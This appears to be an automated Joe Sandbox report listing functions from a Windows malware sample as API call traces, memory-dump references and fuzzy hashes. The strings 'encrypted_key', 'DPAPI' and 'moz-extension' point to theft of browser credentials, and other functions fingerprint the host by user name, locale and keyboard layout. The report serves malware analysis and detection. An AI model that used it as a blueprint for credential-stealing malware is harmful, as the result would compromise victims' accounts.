Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 2647593125-738592651
Opcode ID: d6946be20ca00b497df0e6ec18893ad5627a6ad2dd1b3b7f46de8dabb9b70efe
Instruction ID: a65582d57f446ad043d54cffba13b61d1b4fd3051dca0b4f3d66950676c1878c
Opcode Fuzzy Hash: d6946be20ca00b497df0e6ec18893ad5627a6ad2dd1b3b7f46de8dabb9b70efe
Instruction Fuzzy Hash: 20313EB5D1020DABCF14DFE5DD85AEEB7F8AF48304F145559E905B3242EB30AA08CBA1

Function 6C4EC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C4EC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C4EC969
GetSystemInfo.KERNEL32(?), ref: 6C4EC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C4EC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C4EC9E2

Memory Dump Source

Source File: 00000000.00000002.1883807257.000000006C4D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.1883788263.000000006C4D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883923947.000000006C55E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_i3NmF0obCm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: b2f137c3aabe2da4d7dd855430fb3a2fcdd2b96252e2c6af496ada89fbfce4cf
Instruction ID: 3486bdc2898a9c3590216026ac65d98bfd3b8615ef31126aa4673aadb22cde49
Opcode Fuzzy Hash: b2f137c3aabe2da4d7dd855430fb3a2fcdd2b96252e2c6af496ada89fbfce4cf
Instruction Fuzzy Hash: 01210A31741204ABDB04EB64DC88FAE77B9AF8A345F920119F903A7740EB606C0087A4

Function 00EF5CD0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF5D07
HeapAlloc.KERNEL32(00000000), ref: 00EF5D0E
RegOpenKeyExA.KERNEL32(80000002,0132A4D0,00000000,00020119,?), ref: 00EF5D2E
RegQueryValueExA.KERNEL32(?,01330E68,00000000,00000000,000000FF,000000FF), ref: 00EF5D4F
RegCloseKey.ADVAPI32(?), ref: 00EF5D62

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 151b925a3347d282cc2989e92f90aca300dfcb850586b58ab63c27aa1d8752ad
Instruction ID: 10f5e29429cbe7bbdeeb838db3783a0a4b6d47950e6609c460db3a838ee0b522
Opcode Fuzzy Hash: 151b925a3347d282cc2989e92f90aca300dfcb850586b58ab63c27aa1d8752ad
Instruction Fuzzy Hash: D2114FB2E40609AFD714DB94D949FBBBB78FB44710F104129F715A6284D7B559008FA1

Function 00EF55C0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF55F7
HeapAlloc.KERNEL32(00000000), ref: 00EF55FE
RegOpenKeyExA.KERNEL32(80000002,0132A6C8,00000000,00020119,?), ref: 00EF561E
RegQueryValueExA.KERNEL32(?,01330290,00000000,00000000,000000FF,000000FF), ref: 00EF563F
RegCloseKey.ADVAPI32(?), ref: 00EF5652

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: cf109d5c5fa4dae39a613ff1df3785169ebb977dff099b2b04366f6f350ffae7
Instruction ID: ced618e4666a624bc7725d629e7808b384bc8cec8703cce4960761c3d549cb67
Opcode Fuzzy Hash: cf109d5c5fa4dae39a613ff1df3785169ebb977dff099b2b04366f6f350ffae7
Instruction Fuzzy Hash: D0113DB2E40609AFDB24CB94D949FBBBB78EB48710F504129F726E6284D7B459008BA1

Function 00EE1260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00EE1274
HeapAlloc.KERNEL32(00000000), ref: 00EE127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00EE1297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00EE12B5
RegCloseKey.ADVAPI32(?), ref: 00EE12BF

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3e600e74c2f1fe35cc4a32f1e04c4a2a46a4969c184a070c49681c571f07ea0c
Instruction ID: 78999ea2c74f749ed088a54abafbea447c4f3412a749781ef559ed42da237459
Opcode Fuzzy Hash: 3e600e74c2f1fe35cc4a32f1e04c4a2a46a4969c184a070c49681c571f07ea0c
Instruction Fuzzy Hash: 74011D79E4020CBBDB14DFE0D849F9EB77DBB48700F008168FA15D7284DAB49A408F90

Function 00EE9980 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0132D618,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00EEF82D), ref: 00EE999D
LoadLibraryA.KERNEL32(01330F88,?,?,?,?,?,?,?,?,?,?,?,00EEF82D), ref: 00EE9A26

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

SetEnvironmentVariableA.KERNEL32(0132D618,00000000,00000000,?,00EFEB3C,?,00EEF82D,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00EFE4D6), ref: 00EE9A12

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00EE9992, 00EE99A6, 00EE99BC

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 4c65a43a97a3df4b01b13212a41b68a6636e17bf22df8638c8e89a45f8ec0fb3
Instruction ID: cb0d726d5ba0dfbbebfce51beed164defdfadcf2a6724542ebd5630cac320531
Opcode Fuzzy Hash: 4c65a43a97a3df4b01b13212a41b68a6636e17bf22df8638c8e89a45f8ec0fb3
Instruction Fuzzy Hash: 0D4161B1D002189BCFADDF65E989AAD73B6BB08304F109039E515B7299DBF05D84CF61

Function 00EE65F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Zh,@Zh), ref: 00EE66AF

Strings

Zh, xrefs: 00EE662D, 00EE6649, 00EE6698, 00EE66A8, 00EE6614, 00EE6638, 00EE6643
Zh, xrefs: 00EE65FD, 00EE661D, 00EE669F
@Zh, xrefs: 00EE6690, 00EE6693

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Zh$Zh$Zh
API String ID: 544645111-2769448857
Opcode ID: 641e5996509b502a11004bae1584c3766c1b1acd17b0d39e541b88085c3bcc6f
Instruction ID: 6df415d7d0c56b23d6efdef21f02c8590ec4442c5699ae89a2dd159d97d15658
Opcode Fuzzy Hash: 641e5996509b502a11004bae1584c3766c1b1acd17b0d39e541b88085c3bcc6f
Instruction Fuzzy Hash: F9210574A1024DEFCB04CF8AC594BAEBBF1FB58348F108599D919AB341D335AA81CF81

Function 00EE9B50 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EE9BD1
lstrlen.KERNEL32(00000000), ref: 00EE9F8A

Part of subcall function 00EE9800: memcmp.MSVCRT ref: 00EE981B
Part of subcall function 00EE9800: memset.MSVCRT ref: 00EE984E
Part of subcall function 00EE9800: LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

lstrlen.KERNEL32(00000000,00000000), ref: 00EE9CCD
DeleteFileA.KERNEL32(00000000), ref: 00EEA00B

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 1680b2e7720b3676be015aa40b73c5fac39e70e6ab1308a1e7556883c2d3bf97
Instruction ID: 004f5f6cdc81ed2c38a7a08a13162a721b3298635f2c22c8acb4299c490174b1
Opcode Fuzzy Hash: 1680b2e7720b3676be015aa40b73c5fac39e70e6ab1308a1e7556883c2d3bf97
Instruction Fuzzy Hash: C0D1BC7281011C9ACF19FFA4DD96EFEB379AF14300F5091A9F216B2491EF706A48CB65

Function 00EECEF0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF6A70: GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EECF71
lstrlen.KERNEL32(00000000), ref: 00EED10F
lstrlen.KERNEL32(00000000), ref: 00EED123
DeleteFileA.KERNEL32(00000000), ref: 00EED19C

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 157bc32fca337e28e6cb97a90f736ad7cbe586dbee5d8ead03d27ca93d773052
Instruction ID: 5542b9d5575b8c65aacc327c0f55e6c32489abd5b66b7125768f81b74da179b8
Opcode Fuzzy Hash: 157bc32fca337e28e6cb97a90f736ad7cbe586dbee5d8ead03d27ca93d773052
Instruction Fuzzy Hash: 7C81F97291011C9BCF19FBA0DD96EFEB3B9AF14300F5051A9F216B6091EF746A48CB61

Function 00EEEBD0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
Part of subcall function 00EE93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
Part of subcall function 00EE93C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
Part of subcall function 00EE93C0: ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
Part of subcall function 00EE93C0: LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
Part of subcall function 00EE93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

Part of subcall function 00EF6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF6D62

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00EFEDD0,00EFE766), ref: 00EEEC7C
lstrlen.KERNEL32(00000000), ref: 00EEEC9B

Strings

^userContextId=4294967295, xrefs: 00EEECCC
moz-extension+++, xrefs: 00EEECDD

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: 6bc6d3fc51ae13f043c88ac45ba147d61fa291dc0133f8fce9bc2dc14dd4878e
Instruction ID: 7f265c046afb8d1ebe084dc2807955683ac77ecb537f635d6ae0fda5fbc35df4
Opcode Fuzzy Hash: 6bc6d3fc51ae13f043c88ac45ba147d61fa291dc0133f8fce9bc2dc14dd4878e
Instruction Fuzzy Hash: 6F51D97291020C9ACF18FFB0DD969FEB3B9AF54300F509568F616B6591EF346A08CB61

Function 00EF0CF0 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF5430: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EF5472
Part of subcall function 00EF5430: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EF54AF
Part of subcall function 00EF5430: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF5533
Part of subcall function 00EF5430: HeapAlloc.KERNEL32(00000000), ref: 00EF553A

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF55C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF55F7
Part of subcall function 00EF55C0: HeapAlloc.KERNEL32(00000000), ref: 00EF55FE
Part of subcall function 00EF55C0: RegOpenKeyExA.KERNEL32(80000002,0132A6C8,00000000,00020119,?), ref: 00EF561E
Part of subcall function 00EF55C0: RegQueryValueExA.KERNEL32(?,01330290,00000000,00000000,000000FF,000000FF), ref: 00EF563F
Part of subcall function 00EF55C0: RegCloseKey.ADVAPI32(?), ref: 00EF5652

Part of subcall function 00EF5690: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00EFBA90,000000FF,?,00EF0F79,00000000,?,01330DC8,00000000,?), ref: 00EF56C2
Part of subcall function 00EF5690: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00EFBA90,000000FF,?,00EF0F79,00000000,?,01330DC8,00000000,?), ref: 00EF56C9

Part of subcall function 00EF5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE1177), ref: 00EF5750
Part of subcall function 00EF5720: HeapAlloc.KERNEL32(00000000,?,?,?,00EE1177), ref: 00EF5757
Part of subcall function 00EF5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF576F

Part of subcall function 00EF57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EF495B), ref: 00EF57E0
Part of subcall function 00EF57B0: HeapAlloc.KERNEL32(00000000,?,?,?,00EF495B), ref: 00EF57E7
Part of subcall function 00EF57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF57FF

Part of subcall function 00EF5850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EFE7A8,00000000,?), ref: 00EF5880
Part of subcall function 00EF5850: HeapAlloc.KERNEL32(00000000,?,?,?,?,00EFE7A8,00000000,?), ref: 00EF5887
Part of subcall function 00EF5850: GetLocalTime.KERNEL32(?,?,?,?,?,00EFE7A8,00000000,?), ref: 00EF5894
Part of subcall function 00EF5850: wsprintfA.USER32 ref: 00EF58C3

Part of subcall function 00EF5900: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000), ref: 00EF5933
Part of subcall function 00EF5900: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000,?), ref: 00EF593A
Part of subcall function 00EF5900: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000,?), ref: 00EF594D

Part of subcall function 00EF59D0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000), ref: 00EF5A05

Part of subcall function 00EF5A60: GetKeyboardLayoutList.USER32(00000000,00000000,00EFE12A), ref: 00EF5AB1
Part of subcall function 00EF5A60: LocalAlloc.KERNEL32(00000040,?), ref: 00EF5AC9
Part of subcall function 00EF5A60: GetKeyboardLayoutList.USER32(?,00000000), ref: 00EF5ADD
Part of subcall function 00EF5A60: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EF5B32
